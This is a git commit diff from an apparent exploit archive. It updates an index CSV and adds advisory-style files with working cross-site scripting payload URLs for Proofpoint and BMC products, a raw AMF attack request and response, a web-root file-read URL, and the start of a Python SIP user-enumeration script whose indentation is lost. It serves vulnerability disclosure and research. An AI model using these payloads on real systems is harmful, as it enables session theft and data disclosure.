Update: 2015-01-07

13 new exploits
2015-01-07 08:36:08 +00:00 · 2015-01-07 08:36:08 +00:00 · c263b4d439
commit c263b4d439
parent 14036ab825
14 changed files with 473 additions and 16 deletions
--- a/files.csv
+++ b/files.csv
@ -8098,7 +8098,7 @@ id,file,description,date,author,platform,type,port
 8592,platforms/windows/local/8592.pl,"Beatport Player 1.0.0.283 - (.M3U) Local Stack Overflow Exploit (3)",2009-05-01,Stack,windows,local,0
 8593,platforms/php/webapps/8593.txt,"pecio CMS 1.1.5 (index.php language) Local File Inclusion Vulnerability",2009-05-01,SirGod,php,webapps,0
 8594,platforms/windows/local/8594.pl,"RM Downloader - (.smi ) Universal Local Buffer Overflow Exploit",2009-05-01,Stack,windows,local,0
-8595,platforms/windows/local/8595.txt,"Adobe Acrobat Reader 8.1.2 – 9.0 - getIcon() Memory Corruption Exploit",2009-05-04,Abysssec,windows,local,0
+8595,platforms/windows/local/8595.txt,"Adobe Acrobat Reader 8.1.2 - 9.0 - getIcon() Memory Corruption Exploit",2009-05-04,Abysssec,windows,local,0
 8596,platforms/asp/webapps/8596.pl,"Winn ASP Guestbook 1.01b Remote Database Disclosure Exploit",2009-05-04,ZoRLu,asp,webapps,0
 8597,platforms/solaris/dos/8597.c,"Solaris 10 / OpenSolaris (dtrace) Local Kernel Denial of Service PoC",2009-05-04,mu-b,solaris,dos,0
 8598,platforms/solaris/dos/8598.c,"Solaris 10 / OpenSolaris (fasttrap) Local Kernel Denial of Service PoC",2009-05-04,mu-b,solaris,dos,0
@ -10011,7 +10011,7 @@ id,file,description,date,author,platform,type,port
 10820,platforms/php/dos/10820.sh,"Joomla Core <= 1.5.x com_component - DoS (0day)",2009-12-31,emgent,php,dos,80
 10821,platforms/multiple/webapps/10821.txt,"WingFTP Server 3.2.4 - CSRF Vulnerability",2009-12-30,Ams,multiple,webapps,0
 10822,platforms/php/webapps/10822.txt,"Joomla Component com_rd_download Local File Disclosure Vulnerability",2009-12-30,FL0RiX,php,webapps,0
-10823,platforms/asp/webapps/10823.txt,"UranyumSoft Ýlan Servisi Database Disclosure Vulnerability",2009-12-30,LionTurk,asp,webapps,0
+10823,platforms/asp/webapps/10823.txt,"UranyumSoft Ýlan Servisi - Database Disclosure Vulnerability",2009-12-30,LionTurk,asp,webapps,0
 10824,platforms/php/webapps/10824.txt,"K-Rate SQL Injection Vulnerability",2009-12-30,e.wiZz,php,webapps,0
 10825,platforms/php/dos/10825.sh,"Wordpress <= 2.9 - DoS (0day)",2009-12-31,emgent,php,dos,80
 10826,platforms/php/dos/10826.sh,"Drupal <= 6.16 and 5.21 - DoS (0day)",2009-12-31,emgent,php,dos,80
@ -10885,7 +10885,7 @@ id,file,description,date,author,platform,type,port
 11930,platforms/windows/dos/11930.pl,"ASX to MP3 Converter 3.0.0.100 - Local Stack Overflow PoC",2010-03-29,mat,windows,dos,0
 11931,platforms/asp/webapps/11931.txt,"Asp - comersus7F Shopping Cart Software Backup Dump Vulnerability",2010-03-29,indoushka,asp,webapps,0
 11932,platforms/linux/dos/11932.txt,"xwine 1.0.1 - (.exe) Local Crash PoC Exploit",2010-03-29,JosS,linux,dos,0
-11934,platforms/php/webapps/11934.txt,"Powie's PSCRIPT Gästebuch <= 2.09 SQL Injection Vulnerability",2010-03-29,"Easy Laster",php,webapps,0
+11934,platforms/php/webapps/11934.txt,"Powie's PSCRIPT Gästebuch <= 2.09 - SQL Injection Vulnerability",2010-03-29,"Easy Laster",php,webapps,0
 11935,platforms/php/webapps/11935.txt,"Joomla Component com_guide SQL Injection Vulnerability",2010-03-30,"DevilZ TM",php,webapps,0
 11938,platforms/php/webapps/11938.txt,"Pepsi CMS (Irmin cms) pepsi-0.6-BETA2 - Multiple Local File Vulnerability",2010-03-30,eidelweiss,php,webapps,0
 11939,platforms/php/webapps/11939.txt,"Joomla Component com_spec SQL Injection Vulnerability",2010-03-29,"DevilZ TM",php,webapps,0
@ -10961,7 +10961,7 @@ id,file,description,date,author,platform,type,port
 12022,platforms/php/webapps/12022.txt,"68kb Knowledge Base 1.0.0rc3 - Edit Main Settings CSRF",2010-04-02,"Jelmer de Hen",php,webapps,0
 12024,platforms/windows/local/12024.php,"Zip Unzip 6.0 - (.zip) 0day Stack Buffer Overflow PoC Exploit",2010-04-03,mr_me,windows,local,0
 12025,platforms/windows/dos/12025.php,"Dualis 20.4 - (.bin) Local Daniel Of Service",2010-04-03,"Yakir Wizman",windows,dos,0
-12026,platforms/php/webapps/12026.txt,"phpscripte24 Vor und Rückwärts Auktions System Blind SQL Injection Vulnerability",2010-04-03,"Easy Laster",php,webapps,0
+12026,platforms/php/webapps/12026.txt,"phpscripte24 Vor und Rückwärts Auktions System - Blind SQL Injection Vulnerability",2010-04-03,"Easy Laster",php,webapps,0
 12027,platforms/windows/dos/12027.py,"DSEmu 0.4.10 - (.nds) Local Crash Exploit",2010-04-03,l3D,windows,dos,0
 12028,platforms/php/webapps/12028.txt,"PHP-fusion dsmsf (module downloads) SQL Injection Exploit",2010-04-03,Inj3ct0r,php,webapps,0
 12029,platforms/asp/webapps/12029.txt,"SafeSHOP <= 1.5.6 - Cross-Site Scripting & Multiple Cross-Site Request Forgery",2010-04-03,"cp77fk4r ",asp,webapps,0
@ -11417,7 +11417,7 @@ id,file,description,date,author,platform,type,port
 12532,platforms/php/webapps/12532.txt,"B2B Classic Trading Script (offers.php) SQL Injection Vulnerability",2010-05-08,v3n0m,php,webapps,0
 12533,platforms/php/webapps/12533.txt,"big.asp - SQL Injection Vulnerability",2010-05-08,Ra3cH,php,webapps,0
 12534,platforms/php/webapps/12534.txt,"PHP Link Manager 1.7 - Url Redirection Bug",2010-05-08,ITSecTeam,php,webapps,0
-12535,platforms/php/webapps/12535.txt,"phpscripte24 Countdown Standart Rückwärts Auktions System SQL Injection",2010-05-08,"Easy Laster",php,webapps,0
+12535,platforms/php/webapps/12535.txt,"phpscripte24 Countdown Standart Rückwärts Auktions System - SQL Injection",2010-05-08,"Easy Laster",php,webapps,0
 12539,platforms/php/webapps/12539.txt,"Joomla Component com_articleman Upload Vulnerability",2010-05-08,Sid3^effects,php,webapps,0
 12540,platforms/windows/local/12540.rb,"IDEAL Migration 4.5.1 - Buffer Overflow Exploit (Meta)",2010-05-08,blake,windows,local,0
 12541,platforms/windows/dos/12541.php,"Dolphin 2.0 - (.elf) Local Daniel Of Service",2010-05-09,"Yakir Wizman",windows,dos,0
@ -12951,7 +12951,7 @@ id,file,description,date,author,platform,type,port
 14849,platforms/php/webapps/14849.py,"mBlogger 1.0.04 (viewpost.php) - SQL Injection Exploit",2010-08-31,"Ptrace Security",php,webapps,0
 14851,platforms/php/webapps/14851.txt,"dompdf 0.6.0 beta1 - Remote File Inclusion Vulnerability",2010-09-01,Andre_Corleone,php,webapps,0
 14852,platforms/windows/dos/14852.txt,"leadtools activex common dialogs 16.5 - Multiple Vulnerabilities",2010-09-01,LiquidWorm,windows,dos,0
-14853,platforms/windows/remote/14853.py,"Adobe Acrobat Reader and Flash Player - “newclass” invalid pointer",2010-09-01,Abysssec,windows,remote,0
+14853,platforms/windows/remote/14853.py,"Adobe Acrobat Reader and Flash Player - ""newclass"" invalid pointer",2010-09-01,Abysssec,windows,remote,0
 14854,platforms/php/webapps/14854.py,"Cpanel PHP - Restriction Bypass Vulnerability (0day)",2010-09-01,Abysssec,php,webapps,0
 14856,platforms/windows/remote/14856.txt,"TFTPDWIN 0.4.2 - Directory Traversal Vulnerability",2010-09-01,chr1x,windows,remote,0
 14857,platforms/windows/remote/14857.txt,"tftp desktop 2.5 - Directory Traversal Vulnerability",2010-09-01,chr1x,windows,remote,0
@ -13251,7 +13251,7 @@ id,file,description,date,author,platform,type,port
 15284,platforms/php/webapps/15284.txt,"phpCheckZ 1.1.0 - Blind SQL Injection Vulnerability",2010-10-19,"Salvatore Fresta",php,webapps,0
 15285,platforms/linux/local/15285.c,"Linux Kernel <= 2.6.36-rc8 - RDS Protocol Local Privilege Escalation",2010-10-19,"Dan Rosenberg",linux,local,0
 15287,platforms/windows/local/15287.py,"Winamp 5.5.8 (in_mod plugin) Stack Overflow Exploit",2010-10-19,Mighty-D,windows,local,0
-15288,platforms/windows/remote/15288.txt,"Oracle JRE - java.net.URLConnection class – Same-of-Origin (SOP) Policy Bypass",2010-10-20,"Roberto Suggi Liverani",windows,remote,0
+15288,platforms/windows/remote/15288.txt,"Oracle JRE - java.net.URLConnection class - Same-of-Origin (SOP) Policy Bypass",2010-10-20,"Roberto Suggi Liverani",windows,remote,0
 15290,platforms/jsp/webapps/15290.txt,"Oracle Sun Java System Web Server - HTTP Response Splitting",2010-10-20,"Roberto Suggi Liverani",jsp,webapps,0
 15292,platforms/windows/remote/15292.rb,"ASP.NET Auto-Decryptor File Download Exploit (MS10-070)",2010-10-20,"Agustin Azubel",windows,remote,0
 15293,platforms/linux/dos/15293.txt,"LibSMI smiGetNode Buffer Overflow When Long OID Is Given In Numerical Form",2010-10-20,"Core Security",linux,dos,0
@ -14891,7 +14891,7 @@ id,file,description,date,author,platform,type,port
 17151,platforms/windows/remote/17151.rb,"IBM Lotus Domino iCalendar MAILTO Buffer Overflow",2011-04-04,metasploit,windows,remote,25
 17152,platforms/windows/remote/17152.rb,"ManageEngine Applications Manager Authenticated Code Execution",2011-04-08,metasploit,windows,remote,9090
 17153,platforms/windows/local/17153.rb,"VeryTools Video Spirit Pro <= 1.70 - (.visprj) Buffer Overflow",2011-04-11,metasploit,windows,local,0
-17155,platforms/windows/remote/17155.py,"Cisco Security Agent Management Console ‘st_upload’ RCE Exploit",2011-04-12,"Gerry Eisenhaur",windows,remote,0
+17155,platforms/windows/remote/17155.py,"Cisco Security Agent Management Console - 'st_upload' RCE Exploit",2011-04-12,"Gerry Eisenhaur",windows,remote,0
 17156,platforms/windows/remote/17156.txt,"OpenText FirstClass Client 11.005 - Code Execution",2011-04-12,"Kyle Ossinger",windows,remote,0
 17157,platforms/windows/local/17157.py,"Wordtrainer 3.0 - (.ord) Buffer Overflow Vulnerability",2011-04-12,"C4SS!0 G0M3S",windows,local,0
 17158,platforms/windows/local/17158.txt,"Microsoft HTML Help <= 6.1 - Stack Overflow",2011-04-12,"Luigi Auriemma",windows,local,0
@ -18145,7 +18145,7 @@ id,file,description,date,author,platform,type,port
 20873,platforms/php/webapps/20873.html,"RV Article Publisher CSRF Vulnerability",2012-08-28,DaOne,php,webapps,0
 20874,platforms/php/webapps/20874.html,"RV Shopping Cart CSRF Vulnerability",2012-08-28,DaOne,php,webapps,0
 20876,platforms/windows/remote/20876.pl,"Simple Web Server 2.2-rc2 ASLR Bypass Exploit",2012-08-28,pole,windows,remote,0
-20877,platforms/hardware/webapps/20877.txt,"Conceptronic Grab’n’Go and Sitecom Storage Center Password Disclosure",2012-08-28,"Mattijs van Ommeren",hardware,webapps,0
+20877,platforms/hardware/webapps/20877.txt,"Conceptronic Grab'n'Go and Sitecom Storage Center Password Disclosure",2012-08-28,"Mattijs van Ommeren",hardware,webapps,0
 20878,platforms/cgi/remote/20878.txt,"mimanet source viewer 2.0 - Directory Traversal Vulnerability",2001-05-23,joetesta,cgi,remote,0
 20879,platforms/unix/remote/20879.txt,"OpenServer 5.0.5/5.0.6,HP-UX 10/11,Solaris 2.6/7.0/8 rpc.yppasswdd Buffer Overrun",2001-05-10,metaray,unix,remote,0
 20880,platforms/windows/local/20880.c,"Microsoft Windows 2000 - Debug Registers Vulnerability",2001-05-24,"Georgi Guninski",windows,local,0
@ -18293,7 +18293,7 @@ id,file,description,date,author,platform,type,port
 21028,platforms/hardware/dos/21028.pl,"Cisco IOS 12 UDP Denial of Service Vulnerability",2001-07-25,blackangels,hardware,dos,0
 21029,platforms/multiple/remote/21029.pl,"Softek MailMarshal 4,Trend Micro ScanMail 1.0 SMTP Attachment Protection Bypass",2001-07-25,"Aidan O'Kelly",multiple,remote,0
 21030,platforms/windows/remote/21030.txt,"Snapstream Personal Video Station 1.2 a PVS Directory Traversal Vulnerability",2001-07-26,john@interrorem.com,windows,remote,0
-21032,platforms/hardware/webapps/21032.txt,"Conceptronic Grab’n’Go Network Storage Directory Traversal",2012-09-03,"Mattijs van Ommeren",hardware,webapps,0
+21032,platforms/hardware/webapps/21032.txt,"Conceptronic Grab'n'Go Network Storage Directory Traversal",2012-09-03,"Mattijs van Ommeren",hardware,webapps,0
 21033,platforms/hardware/webapps/21033.txt,"Sitecom Home Storage Center Directory Traversal",2012-09-03,"Mattijs van Ommeren",hardware,webapps,0
 21034,platforms/windows/remote/21034.rb,"SAP NetWeaver Dispatcher DiagTraceR3Info Buffer Overflow",2012-09-07,metasploit,windows,remote,3200
 21035,platforms/windows/remote/21035.txt,"Snapstream PVS 1.2 Plaintext Password Vulnerability",2001-07-26,John,windows,remote,0
@ -26230,7 +26230,7 @@ id,file,description,date,author,platform,type,port
 29263,platforms/windows/local/29263.pl,"BlazeDVD 6.2 - (.plf) Buffer Overflow (SEH)",2013-10-28,"Mike Czumak",windows,local,0
 29264,platforms/php/webapps/29264.txt,"Onpub CMS 1.4 & 1.5 - Multiple SQL Injection Vulnerabilities",2013-10-28,Vulnerability-Lab,php,webapps,0
 29265,platforms/php/webapps/29265.txt,"ILIAS eLearning CMS 4.3.4 & 4.4 - Persistent XSS",2013-10-29,Vulnerability-Lab,php,webapps,0
-29266,platforms/hardware/webapps/29266.txt,"Stem Innovation ‘IZON’ Hard-coded Credentials",2013-10-29,"Mark Stanislav",hardware,webapps,0
+29266,platforms/hardware/webapps/29266.txt,"Stem Innovation 'IZON' Hard-coded Credentials",2013-10-29,"Mark Stanislav",hardware,webapps,0
 29267,platforms/php/webapps/29267.txt,"ProNews 1.5 admin/change.php Multiple Parameter XSS",2006-12-09,Mr_KaLiMaN,php,webapps,0
 29268,platforms/php/webapps/29268.txt,"ProNews 1.5 lire-avis.php aa Parameter SQL Injection",2006-12-09,Mr_KaLiMaN,php,webapps,0
 29269,platforms/php/webapps/29269.txt,"ProNews 1.5 lire-avis.php aa Parameter XSS",2006-12-09,Mr_KaLiMaN,php,webapps,0
@ -27066,7 +27066,7 @@ id,file,description,date,author,platform,type,port
 30162,platforms/php/webapps/30162.txt,"WMSCMS 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2007-06-07,"Glafkos Charalambous ",php,webapps,0
 30163,platforms/multiple/dos/30163.html,"Blue Coat Systems K9 Web Protection 32.36 - Remote Buffer Overflow Vulnerability",2007-06-08,"Dennis Rand",multiple,dos,0
 30164,platforms/hardware/remote/30164.txt,"3Com OfficeConnect Secure Router 1.04-168 Tk Parameter Cross-Site Scripting Vulnerability",2007-06-08,"Secunia Research",hardware,remote,0
-30165,platforms/asp/webapps/30165.txt,"Ibrahim Ã?AKICI Okul Portal 2.0 Haber_Oku.ASP SQL Injection Vulnerability",2007-06-08,ertuqrul,asp,webapps,0
+30165,platforms/asp/webapps/30165.txt,"Ibrahim Ã?AKICI Okul Portal 2.0 - Haber_Oku.ASP SQL Injection Vulnerability",2007-06-08,ertuqrul,asp,webapps,0
 30166,platforms/php/webapps/30166.txt,"WordPress 2.2 Request_URI Parameter Cross-Site Scripting Vulnerability",2007-06-08,zamolx3,php,webapps,0
 30167,platforms/hardware/dos/30167.txt,"Packeteer PacketShaper 7.x Web Interface Remote Denial of Service Vulnerability",2007-06-08,nnposter,hardware,dos,0
 30168,platforms/php/webapps/30168.txt,"vBSupport 2.0.0 Integrated Ticket System vBSupport.PHP SQL Injection Vulnerability",2007-06-09,rUnViRuS,php,webapps,0
@ -27383,8 +27383,8 @@ id,file,description,date,author,platform,type,port
 30546,platforms/windows/local/30546.txt,"Multiple MicroWorld eScan Products Local Privilege Escalation Vulnerability",2007-08-30,"Edi Strosar",windows,local,0
 30547,platforms/hardware/webapps/30547.txt,"D-Link DSL-2750U ME_1.09 - CSRF Vulnerability",2013-12-28,"FIGHTERx war",hardware,webapps,0
 30550,platforms/windows/dos/30550.php,"Ofilter Player 1.1 - (.wav) Integer Division by Zero",2013-12-28,"Osanda Malith",windows,dos,0
-30553,platforms/php/webapps/30553.txt,"Toms Gästebuch 1.00 form.php Multiple Parameter XSS",2007-09-07,cod3in,php,webapps,0
-30554,platforms/php/webapps/30554.txt,"Toms Gästebuch 1.00 admin/header.php Multiple Parameter XSS",2007-09-07,cod3in,php,webapps,0
+30553,platforms/php/webapps/30553.txt,"Toms Gästebuch 1.00 - form.php Multiple Parameter XSS",2007-09-07,cod3in,php,webapps,0
+30554,platforms/php/webapps/30554.txt,"Toms Gästebuch 1.00 - admin/header.php Multiple Parameter XSS",2007-09-07,cod3in,php,webapps,0
 30555,platforms/php/webapps/30555.txt,"MKPortal 1.0/1.1 Admin.PHP Authentication Bypass Vulnerability",2007-09-03,Demential,php,webapps,0
 30556,platforms/php/webapps/30556.html,"Claroline 1.x inc/lib/language.lib.php language Parameter Traversal Local File Inclusion",2007-09-03,"Fernando Munoz",php,webapps,0
 30557,platforms/php/webapps/30557.txt,"Claroline 1.x admin/adminusers.php dir Parameter XSS",2007-09-03,"Fernando Munoz",php,webapps,0
@ -27887,7 +27887,7 @@ id,file,description,date,author,platform,type,port
 31077,platforms/php/webapps/31077.txt,"Mambo/Joomla 'com_buslicense' Component - 'aid' Parameter SQL Injection Vulnerability",2008-01-30,S@BUN,php,webapps,0
 31078,platforms/hardware/remote/31078.txt,"2Wire Routers 'H04_POST' - Access Validation Vulnerability",2008-01-30,"Oligarchy Oligarchy",hardware,remote,0
 31079,platforms/php/webapps/31079.txt,"webSPELL 4.1.2 - 'whoisonline.php' Cross-Site Scripting Vulnerability",2008-01-30,NBBN,php,webapps,0
-31080,platforms/php/webapps/31080.txt,"YeSiL KoRiDoR ZiyaretÃ§i Defteri 'index.php' SQL Injection Vulnerability",2008-01-30,ShaFuck31,php,webapps,0
+31080,platforms/php/webapps/31080.txt,"YeSiL KoRiDoR ZiyaretÃ§i Defteri - 'index.php' SQL Injection Vulnerability",2008-01-30,ShaFuck31,php,webapps,0
 31081,platforms/cgi/webapps/31081.txt,"OpenBSD 4.1 bgplg 'cmd' Parameter Cross-Site Scripting Vulnerability",2007-10-10,"Anton Karpov",cgi,webapps,0
 31082,platforms/php/webapps/31082.txt,"Liferay Enterprise Portal 4.3.6 User-Agent HTTP Header Cross-Site Scripting Vulnerability",2008-01-31,"Tomasz Kuczynski",php,webapps,0
 31083,platforms/php/webapps/31083.txt,"Nilson's Blogger 0.11 - 'comments.php' Local File Include Vulnerability",2008-01-31,muuratsalo,php,webapps,0
@ -31337,7 +31337,7 @@ id,file,description,date,author,platform,type,port
 34795,platforms/php/webapps/34795.txt,"WebAsyst Shop-Script 'index.php' Cross-Site Scripting Vulnerability",2009-07-09,Vrs-hCk,php,webapps,0
 34796,platforms/multiple/remote/34796.txt,"Oracle MySQL < 5.1.50 - Privilege Escalation Vulnerability",2010-08-03,"Libing Song",multiple,remote,0
 34797,platforms/php/webapps/34797.txt,"SurgeMail SurgeWeb 4.3e Cross-Site Scripting Vulnerability",2010-10-04,"Kerem Kocaer",php,webapps,0
-34798,platforms/php/webapps/34798.txt,"ITS SCADA Username SQL Injection Vulnerability²",2010-10-04,"Eugene Salov",php,webapps,0
+34798,platforms/php/webapps/34798.txt,"ITS SCADA Username - SQL Injection Vulnerability",2010-10-04,"Eugene Salov",php,webapps,0
 34800,platforms/php/webapps/34800.txt,"Typo3 JobControl 2.14.0 - Cross-Site Scripting / SQL Injection",2014-09-27,"Adler Freiheit",php,webapps,0
 34802,platforms/hardware/remote/34802.html,"Research In Motion BlackBerry Device Software <= 4.7.1 - Cross Domain Information Disclosure Vulnerability",2010-10-04,"599eme Man",hardware,remote,0
 34803,platforms/php/webapps/34803.txt,"Online Guestbook Pro 5.1 - 'ogp_show.php' Cross-Site Scripting Vulnerability",2009-07-09,Moudi,php,webapps,0
@ -32155,3 +32155,16 @@ id,file,description,date,author,platform,type,port
 35686,platforms/windows/remote/35686.pl,"OpenMyZip 0.1 - (.zip) File Buffer Overflow Vulnerability",2011-05-02,"C4SS!0 G0M3S",windows,remote,0
 35688,platforms/hardware/remote/35688.py,"ASUSWRT 3.0.0.4.376_1071 - LAN Backdoor Command Execution",2015-01-04,"Friedrich Postelstorfer",hardware,remote,0
 35691,platforms/php/webapps/35691.txt,"Crea8Social 2.0 - XSS Change Interface",2015-01-04,"Yudhistira B W",php,webapps,0
+35697,platforms/php/webapps/35697.txt,"Web Auction 0.3.6 'lang' Parameter Cross Site Scripting Vulnerability",2011-05-03,"AutoSec Tools",php,webapps,0
+35698,platforms/cgi/webapps/35698.txt,"Proofpoint Protection Server 5.5.5 'process.cgi' Cross Site Scripting Vulnerability",2011-05-03,"Karan Khosla",cgi,webapps,0
+35699,platforms/php/webapps/35699.txt,"E2 Photo Gallery 0.9 'index.php' Cross Site Scripting Vulnerability",2011-05-03,"High-Tech Bridge SA",php,webapps,0
+35700,platforms/php/webapps/35700.txt,"YaPIG 0.95 Multiple Cross Site Scripting Vulnerabilities",2011-05-03,"High-Tech Bridge SA",php,webapps,0
+35701,platforms/php/webapps/35701.txt,"SelectaPix 1.4.1 'uploadername' Parameter Cross Site Scripting Vulnerability",2011-05-03,"High-Tech Bridge SA",php,webapps,0
+35702,platforms/php/webapps/35702.txt,"Multiple GoT.MY Products 'theme_dir' Parameter Cross Site Scripting Vulnerability",2011-05-03,Hector.x90,php,webapps,0
+35703,platforms/multiple/remote/35703.py,"sipdroid <= 2.2 SIP INVITE Response User Enumeration Weakness",2011-05-04,"Anibal Vaz Marques",multiple,remote,0
+35704,platforms/php/webapps/35704.txt,"WP Ajax Calendar 1.0 'example.php' Cross Site Scripting Vulnerability",2011-05-05,"High-Tech Bridge SA",php,webapps,0
+35705,platforms/php/webapps/35705.txt,"PHP Directory Listing Script 3.1 'index.php' Cross Site Scripting Vulnerability",2011-05-05,"High-Tech Bridge SA",php,webapps,0
+35706,platforms/jsp/webapps/35706.txt,"BMC Remedy Knowledge Management 7.5.00 Default Account and Multiple Cross Site Scripting Vulnerabilities",2011-05-05,"Richard Brain",jsp,webapps,0
+35707,platforms/jsp/webapps/35707.txt,"BMC Dashboards 7.6.01 Cross Site Scripting and Information Disclosure Vulnerabilities",2011-05-05,"Richard Brain",jsp,webapps,0
+35708,platforms/php/webapps/35708.txt,"PHPDug 2.0 Multiple Cross Site Scripting Vulnerabilities",2011-05-05,"High-Tech Bridge SA",php,webapps,0
+35709,platforms/php/webapps/35709.txt,"e107 0.7.25 'news.php' SQL Injection Vulnerability",2011-05-07,KedAns-Dz,php,webapps,0
--- a/platforms/cgi/webapps/35698.txt
+++ b/platforms/cgi/webapps/35698.txt
@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/47687/info
+
+Proofpoint Protection Server is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Proofpoint Protection Server 5.5.5 is vulnerable; other versions may also be affected. 
+
+
+http://www.example.com:10020/enduser/process.cgi?cmd=release&;
+recipient=xxx () yyy com au&
+msg_id=%28MDYzMjU0NTJkYTQ0OWRhYjJlNWY1MjBhNzc5MDEwODlkZGY5OGIzMTc1MGI=%29&
+locale=enus&x=580&y=470&displayprogress=t%22%20
+onmouseover=%22alert%281%29%22%20name=%22frame_display%22%20id=%22
+frame_display%22%20NORESIZE%20SCROLLING=%22no%22%20/%3E%3C!--
--- a/platforms/jsp/webapps/35706.txt
+++ b/platforms/jsp/webapps/35706.txt
@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/47728/info
+
+BMC Remedy Knowledge Management is prone to a default-account vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Attackers can leverage the default account issue to bypass authentication and gain access without permission. Successful exploits can aid in further attacks.
+
+An attacker may leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Remedy Knowledge Management 7.5.00 is vulnerable; other versions may also be affected. 
+
+https://www.example.com/rkm/external.jsp?doc=&#039;%3balert(1)//&user=Self+Help
+https://www.example.com/rkm/search.jsp?user=Self+Help&startDate=\&#039;%3balert(1)//
+https://www.example.com/rkm/usersettings.jsp?"><script>alert(1)</script>
+https://www.example.com/rkm/viewdoc.jsp?doc=><script>alert(1)</script>&user=Self%20Help
+https://www.example.com/rkm/AttachmentServlet?="><script>alert(1)</script>
+https://www.example.com/rkm/index.jsp?user=Self%20Help
--- a/platforms/jsp/webapps/35707.txt
+++ b/platforms/jsp/webapps/35707.txt
@ -0,0 +1,73 @@
+source: http://www.securityfocus.com/bid/47731/info
+
+BMC Dashboards is prone to to multiple information-disclosure and cross-site scripting issues because the application fails to properly sanitize user-supplied input.
+
+A remote attacker may leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Exploiting the information-disclosure issues allows the attacker to view local files within the context of the webserver process.
+
+a)
+https://www.example.com/bmc_help2u/help_services/html/xx/<script>alert(1)</script>404.htm
+
+b)
+https://www.example.com/bmc_help2u/servlet/helpServlet2u?textareaWrap=/bmc_help2u/help_services/demos/frameTst/my0a.jsp&msg="><script>alert(1)</script>
+
+c) multiple XSS within demo pages
+https:/www.example.com/help_services/demos/helpTest.jsp?help='><script>alert(1)</script>
+
+https://www.example.com/bmc_help2u/help_services/demos/setChromeDef.jsp?bFlag=<script>alert(1)</script>&submitVals=Call+setChromeDefBoolean
+
+d) Multiple XSS as the AMF stream is unfiltered
+
+POST /bsmdashboards/messagebroker/amfsecure HTTP/1.1
+Content-Type: application/x-amf
+Host: target-domain.foo
+Content-Length: 462
+........null../58.....    ..
+.COflex.messaging.messages.RemotingMessage.timestamp.headers.operation
+
+bodysource.remotePassword.remoteUsername.parameters.messageId.timeToLive.clientId.destination.........
+#.
+DSId.DSEndpoint.IFDCEEFC2-F318-1B37-7F3A-B438E60525E0..bsd-secure-amf...getUndefinedDataSources<script>alert(1)</script>
+   ..
+.qcom.bmc.bsm.dashboards.services.facade.RequestParameters.
+#.    name.version..208Archive..1.0...
+.Cflex.messaging.io.ArrayCollection    ..
+..I3DDF906B-55F2-5E38-38C1-6A08D1AC077B..........IFDDDB883-6F0C-D935-5E7B-25CDF25C3538.-dashboardArchiveFacade
+
+results:-
+HTTP/1.1 200 OK
+Date: Sat, 02 Oct 2010 00:15:35 GMT
+Server: Microsoft-IIS/6.0
+X-Powered-By: ASP.NET
+Content-Type: application/x-amf
+Content-Length: 4651
+
+......../58/onStatus.......
+.SIflex.messaging.messages.ErrorMessage.headers.rootCause
+body.correlationId.faultDetail.faultString.clientId.timeToLive.destination.timestamp.extendedData.faultCode.messageId
+..
+..acom.bmc.bsm.dashboards.util.logging.BSDException.message
+guid!localizedMessage.cause.arguments.priority.traceback.errorCode.causeSummary.System
+error. Contact your system administrator for assistance.
+.Kcom.bmc.bsm.dashboards.util.guid.Guid!uniqueIdentifier.AdZZZZZZZZJIiCvq53w9q0gerq4j8y0oq.0
+.s?flex.messaging.MessageException.errorMessage."$)logStackTraceEnablednumber
+
+codelogged.statusCode..-defaultLogMessageIntro.details#preferredLogLevel+rootCauseErrorMessage
+.
+......)Method 'getUndefinedDataSources<script>alert(1)</script>' not
+found...1Cannot invoke method 'getUndefinedDataSourcesfdd4d
+
+Consequences:
+An attacker may be able to cause execution of malicious scripting code
+in the browser of a user who clicks on a link to Remedy Knowledge
+Management based site. Such code would run within the security context
+of the target domain. This type of attack can result in non-persistent
+defacement of the target site, or the redirection of confidential
+information (i.e.: session IDs) to unauthorised third parties. No
+authentication is required to exploit this vulnerability.
+
+2) Application is vulnerable to file source code reading limited to the
+web-root.
+
+https://www.example.com/bmc_help2u/servlet/helpServlet2u?textareaWrap=/bmc_help2u/WEB-INF/web.xml
--- a/platforms/multiple/remote/35703.py
+++ b/platforms/multiple/remote/35703.py
@ -0,0 +1,210 @@
+source: http://www.securityfocus.com/bid/47710/info
+
+sipdroid is prone to a user-enumeration weakness.
+
+An attacker may leverage this issue to harvest valid usernames, which may aid in brute-force attacks.
+
+sipdroid 1.6.1, 2.0.1, and 2.2 running on Android 2.1 are vulnerable; other versions may also be affected. 
+
+#!/usr/bin/env python
+# Adapted from SipVicious by Anibal Aguiar - anibal.aguiar *SPAM*
+tempest.com.br
+#
+# This code is only for security researches/teaching purposes,use at
+your own risk!
+
+
+import sys
+import random
+
+def printmsg(msg, color):
+OKGREEN = '\033[92m'
+OKBLUE = '\033[96m'
+ENDC = '\033[0m'
+WARN = '\033[91m'
+
+if color is "Blue":
+return OKBLUE + msg + ENDC
+elif color is "Green":
+return OKGREEN + msg + ENDC
+elif color is "WARNING":
+return WARN + msg + ENDC
+
+def makeRequest(method,dspname,toaddr,
+dsthost,port,callid,srchost='',
+branchunique=None,localtag=None,
+extension=None,body='',useragent=None,
+cseq=1,auth=None,contact='<sip:123@1.1.1.1>',
+accept='application/sdp',contentlength=None,
+localport=5060,contenttype=None):
+
+if extension is None:
+uri = 'sip:%s' % dsthost
+else:
+uri = 'sip:%s@%s' % (extension,dsthost)
+if branchunique is None:
+branchunique = '%s' % random.getrandbits(32)
+headers = dict()
+finalheaders = dict()
+superheaders = dict()
+superheaders['Via'] = 'SIP/2.0/UDP %s:%s;branch=z9hG4bK%s;rport' %
+(srchost,localport,branchunique)
+headers['Max-Forwards'] = 70
+headers['To'] = uri
+headers['From'] = "\"%s\"" % dspname
+if useragent is None:
+headers['User-Agent'] = 'friendly-scanner'
+headers['From'] += ';tag=as%s' % localtag
